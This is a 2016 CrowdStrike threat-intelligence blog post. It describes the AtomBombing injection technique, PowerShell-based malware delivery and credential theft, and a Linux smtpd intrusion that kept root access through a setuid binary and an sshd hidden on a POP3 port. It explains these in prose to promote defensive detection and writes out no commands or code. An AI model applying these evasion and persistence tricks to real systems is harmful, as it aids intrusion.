Our website uses cookies to enhance your browsing experience.


Adversary Tricks and CrowdStrike Treats: 2016 Halloween and AtomBombing Edition

Crowdstrike Boo

Yet another season for trick-or-treating is upon us, and just like I did last year, I wanted to share some of the new tricks we are seeing from targeted adversaries as observed by our Falcon ThreatGraph™, which collects threat data in real-time from our customer endpoint systems distributed in 176 countries.

But before I jump into the latest tradecraft we are observing in the wild, I would be remiss not to discuss the so-called AtomBombing code injection technique that was recently discussed by Tal Liberman as being capable of evading most legacy Anti-Virus products. Variants of this technique which use the NtQueueApcThread syscall to trigger code execution have actually been demonstrated before and used in a number of malware variants over the years. Wayne Low from F-Secure described a ransomware variant using just that type of technique (using Section objects instead of Atoms) in a 2012 Virus Bulletin article.

When the technique was first blogged about on Thursday, one of our engineers was curious to see how it would fare against the Indicator-of-Attack (IOA) based approach of Falcon Host, which doesn’t rely on advanced knowledge of vulnerability or exploit technique to detect a threat. Instead, it looks for the ultimate objective of the threat – in this case getting code execution regardless of what the exact exploitation approach looked like. As predicted, Falcon Host had no trouble picking up an injection using this technique:


Falcon Host vs. AtomBombing (1:0)

Last year, I discussed the extensive use of ‘malware-free’ techniques by targeted adversaries for conducting intrusions into corporate networks. However, these techniques are not just used exclusively for targeted intrusions. Increasingly we are seeing mass-distributed malware threats, such as ransomware, leverage Powershell for malicious activity. Here is an example of a process tree that Falcon Host had picked up in the wild of JavaScript-initiated execution of Powershell under the Chrome browser to download and execute malware:


Powershell-enabled malware distribution under Chrome

Note the mixed capitalization of letters in the Command Line for powershell execution. No doubt the adversary is hoping to bypass legacy detection technologies that are doing direct content/signature matching.

Even when malware is used (often for persistence), we often see Powershell as the method of choice to achieve specific objectives within the environment. Below is an example of an attempted breach we recently detected via multiple IOAs at a client. In this case, the persistent malware is executing a command shell, which in turn runs a powershell command that proceeds to steal credentials from memory and perform reconnaissance.


Powershell-based reconnaissance and credential theft

Last but not least, so as not to leave out our *nix friends, I want to share with you a recent intrusion we picked up on a Linux host. An initial compromise of smtpd mail daemon results in initial system reconnaissance through bash. The attacker performs a directory listing, checks logged in users and collects group and user information. Then they executed the ./a binary, which is a setuid executable designed to give them persistent root access and ultimately started an sshd server to give them persistent access into the environment on a POP3 port to avoid suspicion.

Linux compromise via smtpd exploitation

Finally, this being a Halloween blog, I’d be remiss not to share our latest adversary desktop backgrounds for you to decorate your desktops with. And with us being only 8 days before the U.S. election day, what better adversary to provide than FANCY BEAR, the Russian intelligence-affiliated actors that have become the celebrities of sorts during this election campaign.


Desktop Background:

1020 x 1080 | 1440 x 900 | 2160 x 1440

For more information on how IOAs work and how they contribute to the unique effectiveness of the Falcon Host platform, please download the white paper, “ Indicators of Attack vs. Indicators of Compromise .”

CrowdStrike Falcon Free Trial

Dmitri Alperovitch

Dmitri Alperovitch is a Co-founder of CrowdStrike who left the company in February 2020.


Try CrowdStrike Free for 15 Days Get Started with A Free Trial